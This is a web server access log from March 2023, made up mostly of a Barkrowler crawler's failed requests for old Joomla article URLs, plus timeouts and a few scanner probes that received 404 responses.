217.113.194.54 - - [06/Mar/2023:21:46:59 +0100] "GET /index.php?option=com_content&Itemid=11&catid=7&id=18&lang=fr&view=article HTTP/1.1" 404 2587 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
217.113.194.37 - - [06/Mar/2023:21:47:23 +0100] "GET /index.php?option=com_content&Itemid=11&catid=7&id=19&lang=fr&view=article HTTP/1.1" 404 2587 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
217.113.194.60 - - [06/Mar/2023:21:47:48 +0100] "GET /index.php?option=com_content&Itemid=12&catid=7&id=18&lang=fr&view=article HTTP/1.1" 404 2587 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
217.113.194.8 - - [06/Mar/2023:21:48:13 +0100] "GET /index.php?option=com_content&Itemid=12&catid=7&id=19&lang=fr&view=article HTTP/1.1" 404 2587 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
212.129.37.175 - - [06/Mar/2023:21:48:15 +0100] "-" 408 1489 "-" "-"
217.113.194.44 - - [06/Mar/2023:21:48:37 +0100] "GET /index.php?option=com_content&catid=7&format=pdf&id=25&lang=en&view=article HTTP/1.1" 404 2587 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
217.113.194.1 - - [06/Mar/2023:21:49:02 +0100] "GET /index.php?option=com_content&catid=7&format=pdf&id=63&lang=fr&view=article HTTP/1.1" 404 2587 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
212.129.37.175 - - [06/Mar/2023:21:49:14 +0100] "-" 408 1489 "-" "-"
217.113.194.1 - - [06/Mar/2023:21:49:26 +0100] "GET /index.php?option=com_content&catid=7&format=pdf&id=141&lang=fr&view=article HTTP/1.1" 404 2587 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
217.113.194.23 - - [06/Mar/2023:21:49:50 +0100] "GET /index.php?option=com_content&catid=7&format=pdf&id=22&lang=fr&view=article HTTP/1.1" 404 2587 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
212.129.37.175 - - [06/Mar/2023:21:50:11 +0100] "-" 408 1489 "-" "-"
217.113.194.13 - - [06/Mar/2023:21:50:15 +0100] "GET /index.php?option=com_content&catid=7&format=pdf&id=73&lang=fr&view=article HTTP/1.1" 404 2587 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
217.113.194.38 - - [06/Mar/2023:21:50:39 +0100] "GET /index.php?option=com_content&catid=7&format=pdf&id=21&lang=en&view=article HTTP/1.1" 404 2587 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
217.113.194.12 - - [06/Mar/2023:21:51:03 +0100] "GET /index.php?option=com_content&Itemid=0&catid=7&id=21&lang=fr&view=article HTTP/1.1" 404 2587 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
217.113.194.7 - - [06/Mar/2023:21:51:28 +0100] "GET /index.php?option=com_content&Itemid=0&catid=7&id=141&lang=en&view=article HTTP/1.1" 404 2587 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
217.113.194.9 - - [06/Mar/2023:21:51:52 +0100] "GET /index.php?option=com_content&Itemid=0&catid=7&id=141&lang=fr&view=article HTTP/1.1" 404 2587 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
217.113.194.43 - - [06/Mar/2023:21:52:16 +0100] "GET /index.php?option=com_content&Itemid=53&catid=1&id=461&lang=en&view=article HTTP/1.1" 404 2587 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
217.113.194.38 - - [06/Mar/2023:21:52:41 +0100] "GET /index.php?option=com_content&Itemid=53&catid=1&id=437&lang=en&view=article HTTP/1.1" 404 2587 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
217.113.194.1 - - [06/Mar/2023:21:53:05 +0100] "GET /index.php?option=com_content&Itemid=5&catid=7&id=73&lang=fr&view=article HTTP/1.1" 404 2587 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
212.129.37.175 - - [06/Mar/2023:21:53:09 +0100] "-" 408 1489 "-" "-"
217.113.194.2 - - [06/Mar/2023:21:53:29 +0100] "GET /index.php?option=com_content&Itemid=48&catid=7&id=11&lang=en&view=article HTTP/1.1" 404 2587 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
217.113.194.21 - - [06/Mar/2023:21:53:54 +0100] "GET /index.php?option=com_content&Itemid=47&catid=7&id=22&lang=en&view=article HTTP/1.1" 404 2587 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
212.129.37.175 - - [06/Mar/2023:21:54:08 +0100] "-" 408 1489 "-" "-"
217.113.194.41 - - [06/Mar/2023:21:54:18 +0100] "GET /index.php?option=com_content&Itemid=47&catid=7&id=29&lang=fr&view=article HTTP/1.1" 404 2587 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
212.129.37.175 - - [06/Mar/2023:21:54:37 +0100] "-" 408 1489 "-" "-"
217.113.194.47 - - [06/Mar/2023:21:54:43 +0100] "GET /index.php?option=com_content&Itemid=47&catid=7&id=26&lang=fr&view=article HTTP/1.1" 404 2587 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
217.113.194.56 - - [06/Mar/2023:21:55:07 +0100] "GET /index.php?option=com_content&Itemid=47&catid=7&id=5&lang=en&view=article HTTP/1.1" 404 2587 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
217.113.194.15 - - [06/Mar/2023:21:55:31 +0100] "GET /index.php?option=com_content&Itemid=3&id=1&lang=en&layout=blog&view=category HTTP/1.1" 404 2587 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
217.113.194.58 - - [06/Mar/2023:21:55:56 +0100] "GET /index.php?option=com_content&Itemid=3&id=1&lang=fr&layout=blog&view=category HTTP/1.1" 404 2586 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
217.113.194.51 - - [06/Mar/2023:21:56:20 +0100] "GET /index.php?option=com_content&Itemid=12&catid=7&id=62&lang=fr&view=article HTTP/1.1" 404 2587 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
217.113.194.38 - - [06/Mar/2023:21:56:45 +0100] "GET /index.php?option=com_content&Itemid=12&catid=7&id=29&lang=fr&view=article HTTP/1.1" 404 2587 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
217.113.194.34 - - [06/Mar/2023:21:57:09 +0100] "GET /index.php?option=com_content&Itemid=12&catid=7&id=21&lang=fr&view=article HTTP/1.1" 404 2587 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
217.113.194.35 - - [06/Mar/2023:21:57:33 +0100] "GET /index.php?option=com_content&Itemid=12&catid=7&id=25&lang=fr&view=article HTTP/1.1" 404 2587 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
217.113.194.16 - - [06/Mar/2023:21:57:58 +0100] "GET /index.php?option=com_content&Itemid=12&catid=7&id=26&lang=fr&view=article HTTP/1.1" 404 2587 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
193.118.53.210 - - [06/Mar/2023:21:58:01 +0100] "GET /Telerik.Web.UI.WebResource.axd?type=rau HTTP/1.1" 404 1981 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
212.129.37.175 - - [06/Mar/2023:21:58:02 +0100] "-" 408 1489 "-" "-"
217.113.194.47 - - [06/Mar/2023:21:58:22 +0100] "GET /index.php?option=com_content&Itemid=12&catid=7&id=63&lang=fr&view=article HTTP/1.1" 404 2587 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
217.113.194.37 - - [06/Mar/2023:21:58:47 +0100] "GET /index.php?option=com_content&Itemid=12&catid=7&id=22&lang=fr&view=article HTTP/1.1" 404 2587 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
212.129.37.175 - - [06/Mar/2023:21:59:01 +0100] "-" 408 1489 "-" "-"
212.129.37.175 - - [06/Mar/2023:21:59:04 +0100] "-" 408 1489 "-" "-"
217.113.194.24 - - [06/Mar/2023:21:59:11 +0100] "GET /index.php?option=com_content&Itemid=12&catid=7&id=23&lang=en&view=article HTTP/1.1" 404 2587 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
217.113.194.42 - - [06/Mar/2023:21:59:36 +0100] "GET /index.php?option=com_content&Itemid=4&catid=7&id=73&lang=fr&view=article HTTP/1.1" 404 2587 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
217.113.194.38 - - [06/Mar/2023:22:00:00 +0100] "GET /index.php?option=com_content&Itemid=0&catid=7&id=73&lang=en&view=article HTTP/1.1" 404 2587 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
217.113.194.22 - - [06/Mar/2023:22:00:24 +0100] "GET /index.php?option=com_content&Itemid=49&catid=7&id=29&lang=fr&view=article HTTP/1.1" 404 2587 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
217.113.194.43 - - [06/Mar/2023:22:00:49 +0100] "GET /index.php?option=com_content&Itemid=49&catid=7&id=22&lang=fr&view=article HTTP/1.1" 404 2587 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
217.113.194.53 - - [06/Mar/2023:22:01:13 +0100] "GET /index.php?option=com_content&Itemid=49&catid=7&id=63&lang=fr&view=article HTTP/1.1" 404 2587 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
217.113.194.31 - - [06/Mar/2023:22:01:38 +0100] "GET /index.php?option=com_content&Itemid=49&catid=7&id=26&lang=fr&view=article HTTP/1.1" 404 2587 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
217.113.194.18 - - [06/Mar/2023:22:02:02 +0100] "GET /index.php?option=com_content&Itemid=49&catid=7&id=26&lang=en&view=article HTTP/1.1" 404 2587 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
217.113.194.57 - - [06/Mar/2023:22:02:27 +0100] "GET /index.php?option=com_content&Itemid=49&catid=7&id=62&lang=fr&view=article HTTP/1.1" 404 2587 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
217.113.194.6 - - [06/Mar/2023:22:02:52 +0100] "GET /index.php?option=com_content&Itemid=49&catid=7&id=21&lang=fr&view=article HTTP/1.1" 404 2587 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
212.129.37.175 - - [06/Mar/2023:22:02:57 +0100] "-" 408 1489 "-" "-"
217.113.194.13 - - [06/Mar/2023:22:03:16 +0100] "GET /index.php?option=com_content&Itemid=49&catid=7&id=25&lang=fr&view=article HTTP/1.1" 404 2587 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
212.129.37.175 - - [06/Mar/2023:22:03:30 +0100] "-" 408 1489 "-" "-"
217.113.194.26 - - [06/Mar/2023:22:03:41 +0100] "GET /index.php?option=com_content&Itemid=14&catid=7&id=23&lang=fr&view=article HTTP/1.1" 404 2587 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
212.129.37.175 - - [06/Mar/2023:22:03:55 +0100] "-" 408 1489 "-" "-"
217.113.194.3 - - [06/Mar/2023:22:04:05 +0100] "GET /index.php?option=com_content&Itemid=14&catid=7&id=29&lang=fr&view=article HTTP/1.1" 404 2587 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
217.113.194.20 - - [06/Mar/2023:22:04:30 +0100] "GET /index.php?option=com_content&Itemid=14&catid=7&id=22&lang=fr&view=article HTTP/1.1" 404 2587 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
217.113.194.33 - - [06/Mar/2023:22:04:54 +0100] "GET /index.php?option=com_content&Itemid=14&catid=7&id=63&lang=fr&view=article HTTP/1.1" 404 2587 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
217.113.194.23 - - [06/Mar/2023:22:05:19 +0100] "GET /index.php?option=com_content&Itemid=14&catid=7&id=26&lang=fr&view=article HTTP/1.1" 404 2587 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
217.113.194.45 - - [06/Mar/2023:22:05:43 +0100] "GET /index.php?option=com_content&Itemid=14&catid=7&id=26&lang=en&view=article HTTP/1.1" 404 2587 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
217.113.194.27 - - [06/Mar/2023:22:06:07 +0100] "GET /index.php?option=com_content&Itemid=14&catid=7&id=21&lang=fr&view=article HTTP/1.1" 404 2587 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
217.113.194.45 - - [06/Mar/2023:22:06:32 +0100] "GET /index.php?option=com_content&Itemid=14&catid=7&id=25&lang=fr&view=article HTTP/1.1" 404 2587 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
217.113.194.17 - - [06/Mar/2023:22:06:56 +0100] "GET /index.php?option=com_content&Itemid=14&catid=14&id=14&lang=fr&view=article HTTP/1.1" 404 2587 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
217.113.194.36 - - [06/Mar/2023:22:07:21 +0100] "GET /index.php?option=com_content&Itemid=50&catid=7&id=29&lang=fr&view=article HTTP/1.1" 404 2587 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
217.113.194.11 - - [06/Mar/2023:22:07:45 +0100] "GET /index.php?option=com_content&Itemid=50&catid=7&id=22&lang=fr&view=article HTTP/1.1" 404 2587 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
212.129.37.175 - - [06/Mar/2023:22:07:50 +0100] "-" 408 1489 "-" "-"
212.129.37.175 - - [06/Mar/2023:22:07:57 +0100] "-" 408 1489 "-" "-"
217.113.194.19 - - [06/Mar/2023:22:08:10 +0100] "GET /index.php?option=com_content&Itemid=50&catid=7&id=63&lang=fr&view=article HTTP/1.1" 404 2587 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
217.113.194.6 - - [06/Mar/2023:22:08:34 +0100] "GET /index.php?option=com_content&Itemid=50&catid=7&id=26&lang=fr&view=article HTTP/1.1" 404 2587 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
212.129.37.175 - - [06/Mar/2023:22:08:49 +0100] "-" 408 1489 "-" "-"
217.113.194.40 - - [06/Mar/2023:22:08:59 +0100] "GET /index.php?option=com_content&Itemid=50&catid=7&id=62&lang=fr&view=article HTTP/1.1" 404 2587 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
217.113.194.37 - - [06/Mar/2023:22:09:24 +0100] "GET /index.php?option=com_content&Itemid=50&catid=7&id=21&lang=fr&view=article HTTP/1.1" 404 2587 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
217.113.194.9 - - [06/Mar/2023:22:09:48 +0100] "GET /index.php?option=com_content&Itemid=50&catid=7&id=25&lang=fr&view=article HTTP/1.1" 404 2587 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
217.113.194.56 - - [06/Mar/2023:22:10:13 +0100] "GET /index.php?option=com_content&Itemid=50&catid=7&id=25&lang=en&view=article HTTP/1.1" 404 2587 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
217.113.194.50 - - [06/Mar/2023:22:10:37 +0100] "GET /index.php?option=com_content&Itemid=14&format=pdf&id=103&lang=fr&view=article HTTP/1.1" 404 2587 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
217.113.194.62 - - [06/Mar/2023:22:11:02 +0100] "GET /index.php?option=com_content&Itemid=53&catid=1&id=460&lang=en&view=article HTTP/1.1" 404 2587 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
217.113.194.63 - - [06/Mar/2023:22:11:26 +0100] "GET /index.php?option=com_content&Itemid=53&catid=1&id=462&lang=en&view=article HTTP/1.1" 404 2587 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
217.113.194.20 - - [06/Mar/2023:22:11:51 +0100] "GET /index.php?option=com_content&Itemid=53&catid=1&id=489&lang=en&view=article HTTP/1.1" 404 2587 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
217.113.194.38 - - [06/Mar/2023:22:12:15 +0100] "GET /index.php?option=com_content&Itemid=53&catid=1&id=435&lang=en&view=article HTTP/1.1" 404 2587 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
212.129.37.175 - - [06/Mar/2023:22:12:23 +0100] "-" 408 1489 "-" "-"
217.113.194.8 - - [06/Mar/2023:22:12:39 +0100] "GET /index.php?option=com_content&Itemid=53&catid=7&id=29&lang=fr&view=article HTTP/1.1" 404 2587 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
212.129.37.175 - - [06/Mar/2023:22:12:44 +0100] "-" 408 1489 "-" "-"
217.113.194.37 - - [06/Mar/2023:22:13:04 +0100] "GET /index.php?option=com_content&Itemid=53&catid=7&id=22&lang=fr&view=article HTTP/1.1" 404 2587 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
217.113.194.53 - - [06/Mar/2023:22:13:28 +0100] "GET /index.php?option=com_content&Itemid=53&catid=7&id=63&lang=fr&view=article HTTP/1.1" 404 2587 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
212.129.37.175 - - [06/Mar/2023:22:13:42 +0100] "-" 408 1489 "-" "-"
217.113.194.16 - - [06/Mar/2023:22:13:53 +0100] "GET /index.php?option=com_content&Itemid=53&catid=7&id=26&lang=fr&view=article HTTP/1.1" 404 2587 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
34.220.189.16 - - [06/Mar/2023:22:14:10 +0100] "GET / HTTP/1.1" 404 2009 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36"
34.220.189.16 - - [06/Mar/2023:22:14:12 +0100] "GET / HTTP/1.1" 404 2009 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36"
217.113.194.58 - - [06/Mar/2023:22:14:17 +0100] "GET /index.php?option=com_content&Itemid=53&catid=7&id=23&lang=fr&view=article HTTP/1.1" 404 2587 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
217.113.194.32 - - [06/Mar/2023:22:14:42 +0100] "GET /index.php?option=com_content&Itemid=53&catid=7&id=62&lang=fr&view=article HTTP/1.1" 404 2587 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
143.244.50.172 - - [06/Mar/2023:22:14:45 +0100] "GET / HTTP/1.1" 302 424 "-" "Linux Gnu (cow)"
217.113.194.57 - - [06/Mar/2023:22:15:06 +0100] "GET /index.php?option=com_content&Itemid=53&catid=7&id=21&lang=fr&view=article HTTP/1.1" 404 2587 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
217.113.194.22 - - [06/Mar/2023:22:15:31 +0100] "GET /index.php?option=com_content&Itemid=53&catid=7&id=25&lang=en&view=article HTTP/1.1" 404 2587 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
217.113.194.1 - - [06/Mar/2023:22:15:55 +0100] "GET /index.php?option=com_content&Itemid=53&catid=7&id=25&lang=fr&view=article HTTP/1.1" 404 2587 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
217.113.194.27 - - [06/Mar/2023:22:16:20 +0100] "GET /index.php?option=com_content&Itemid=45&catid=7&id=23&lang=en&view=article HTTP/1.1" 404 2587 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
192.241.216.8 - - [06/Mar/2023:22:16:36 +0100] "GET /version HTTP/1.1" 404 1963 "-" "Mozilla/5.0 zgrab/0.x"
217.113.194.13 - - [06/Mar/2023:22:16:44 +0100] "GET /index.php?option=com_content&Itemid=45&catid=7&id=29&lang=fr&view=article HTTP/1.1" 404 2587 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
212.129.37.175 - - [06/Mar/2023:22:16:50 +0100] "-" 408 1489 "-" "-"
217.113.194.48 - - [06/Mar/2023:22:17:09 +0100] "GET /index.php?option=com_content&Itemid=45&catid=7&id=22&lang=fr&view=article HTTP/1.1" 404 2587 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
217.113.194.63 - - [06/Mar/2023:22:17:33 +0100] "GET /index.php?option=com_content&Itemid=45&catid=7&id=63&lang=fr&view=article HTTP/1.1" 404 2587 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
212.129.37.175 - - [06/Mar/2023:22:17:38 +0100] "-" 408 1489 "-" "-"
217.113.194.42 - - [06/Mar/2023:22:17:57 +0100] "GET /index.php?option=com_content&Itemid=45&catid=7&id=26&lang=fr&view=article HTTP/1.1" 404 2587 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
217.113.194.16 - - [06/Mar/2023:22:18:22 +0100] "GET /index.php?option=com_content&Itemid=45&catid=7&id=21&lang=fr&view=article HTTP/1.1" 404 2587 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
212.129.37.175 - - [06/Mar/2023:22:18:35 +0100] "-" 408 1489 "-" "-"
217.113.194.17 - - [06/Mar/2023:22:18:46 +0100] "GET /index.php?option=com_content&Itemid=45&catid=7&id=25&lang=fr&view=article HTTP/1.1" 404 2587 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
217.113.194.5 - - [06/Mar/2023:22:19:11 +0100] "GET /index.php?option=com_content&Itemid=48&catid=7&id=23&lang=fr&view=article HTTP/1.1" 404 2587 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
217.113.194.12 - - [06/Mar/2023:22:19:35 +0100] "GET /index.php?option=com_content&Itemid=48&catid=7&id=29&lang=fr&view=article HTTP/1.1" 404 2587 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
217.113.194.17 - - [06/Mar/2023:22:20:00 +0100] "GET /index.php?option=com_content&Itemid=48&catid=7&id=22&lang=fr&view=article HTTP/1.1" 404 2587 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
217.113.194.40 - - [06/Mar/2023:22:20:24 +0100] "GET /index.php?option=com_content&Itemid=48&catid=7&id=63&lang=fr&view=article HTTP/1.1" 404 2587 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
217.113.194.54 - - [06/Mar/2023:22:20:49 +0100] "GET /index.php?option=com_content&Itemid=48&catid=7&id=26&lang=fr&view=article HTTP/1.1" 404 2587 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
217.113.194.46 - - [06/Mar/2023:22:21:13 +0100] "GET /index.php?option=com_content&Itemid=48&catid=7&id=62&lang=fr&view=article HTTP/1.1" 404 2587 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
212.129.37.175 - - [06/Mar/2023:22:21:16 +0100] "-" 408 1489 "-" "-"
217.113.194.45 - - [06/Mar/2023:22:21:38 +0100] "GET /index.php?option=com_content&Itemid=48&catid=7&id=21&lang=fr&view=article HTTP/1.1" 404 2587 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
217.113.194.32 - - [06/Mar/2023:22:22:02 +0100] "GET /index.php?option=com_content&Itemid=48&catid=7&id=25&lang=fr&view=article HTTP/1.1" 404 2587 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
217.113.194.1 - - [06/Mar/2023:22:22:27 +0100] "GET /index.php?option=com_content&Itemid=48&catid=7&id=12&lang=en&view=article HTTP/1.1" 404 2587 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
212.129.37.175 - - [06/Mar/2023:22:22:31 +0100] "-" 408 1489 "-" "-"
217.113.194.48 - - [06/Mar/2023:22:22:51 +0100] "GET /index.php?option=com_content&Itemid=46&catid=7&id=29&lang=fr&view=article HTTP/1.1" 404 2587 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
217.113.194.57 - - [06/Mar/2023:22:23:16 +0100] "GET /index.php?option=com_content&Itemid=46&catid=7&id=22&lang=fr&view=article HTTP/1.1" 404 2587 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
212.129.37.175 - - [06/Mar/2023:22:23:29 +0100] "-" 408 1489 "-" "-"
217.113.194.15 - - [06/Mar/2023:22:23:40 +0100] "GET /index.php?option=com_content&Itemid=46&catid=7&id=63&lang=fr&view=article HTTP/1.1" 404 2587 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
217.113.194.46 - - [06/Mar/2023:22:24:04 +0100] "GET /index.php?option=com_content&Itemid=46&catid=7&id=21&lang=fr&view=article HTTP/1.1" 404 2587 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
217.113.194.26 - - [06/Mar/2023:22:24:29 +0100] "GET /index.php?option=com_content&Itemid=47&catid=7&id=23&lang=en&view=article HTTP/1.1" 404 2587 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
217.113.194.5 - - [06/Mar/2023:22:24:53 +0100] "GET /index.php?option=com_content&Itemid=5&format=pdf&id=256&lang=en&view=article HTTP/1.1" 404 2587 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
217.113.194.34 - - [06/Mar/2023:22:25:17 +0100] "GET /index.php?option=com_content&Itemid=16&catid=7&id=23&lang=fr&view=article HTTP/1.1" 404 2587 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
217.113.194.8 - - [06/Mar/2023:22:25:42 +0100] "GET /index.php?option=com_content&Itemid=16&catid=7&id=29&lang=fr&view=article HTTP/1.1" 404 2587 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
212.129.37.175 - - [06/Mar/2023:22:25:43 +0100] "-" 408 1489 "-" "-"
217.113.194.37 - - [06/Mar/2023:22:26:06 +0100] "GET /index.php?option=com_content&Itemid=16&catid=7&id=22&lang=fr&view=article HTTP/1.1" 404 2587 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
217.113.194.63 - - [06/Mar/2023:22:26:30 +0100] "GET /index.php?option=com_content&Itemid=16&catid=7&id=22&lang=en&view=article HTTP/1.1" 404 2587 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
217.113.194.40 - - [06/Mar/2023:22:26:55 +0100] "GET /index.php?option=com_content&Itemid=16&catid=7&id=63&lang=fr&view=article HTTP/1.1" 404 2587 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
217.113.194.45 - - [06/Mar/2023:22:27:19 +0100] "GET /index.php?option=com_content&Itemid=16&catid=7&id=26&lang=fr&view=article HTTP/1.1" 404 2587 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
212.129.37.175 - - [06/Mar/2023:22:27:24 +0100] "-" 408 1489 "-" "-"
217.113.194.54 - - [06/Mar/2023:22:27:44 +0100] "GET /index.php?option=com_content&Itemid=16&catid=7&id=62&lang=fr&view=article HTTP/1.1" 404 2587 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
217.113.194.7 - - [06/Mar/2023:22:28:08 +0100] "GET /index.php?option=com_content&Itemid=16&catid=7&id=21&lang=fr&view=article HTTP/1.1" 404 2587 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
